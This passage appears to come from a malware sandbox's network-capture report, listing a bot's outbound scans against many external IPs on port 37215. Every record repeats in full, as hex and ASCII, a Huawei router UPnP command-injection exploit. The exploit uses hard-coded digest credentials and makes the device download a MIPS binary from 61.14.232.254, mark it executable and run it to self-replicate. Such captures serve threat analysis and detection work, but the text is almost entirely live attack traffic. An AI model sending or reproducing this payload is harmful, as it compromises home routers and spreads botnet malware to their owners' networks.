69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  644192.168.2.134659641.190.174.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.336040020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  645192.168.2.1332956208.245.86.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.336064100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  646192.168.2.133378841.74.173.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.359882116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  647192.168.2.1342660197.191.36.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.359885931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  648192.168.2.135950041.96.20.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.363976002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  649192.168.2.1357088158.65.110.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364008904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  650192.168.2.1355016165.236.109.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364109039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  651192.168.2.133729078.188.192.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364120007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  652192.168.2.1351762157.90.180.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364203930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  653192.168.2.135829241.50.217.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364229918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  654192.168.2.135838841.142.9.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.364250898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
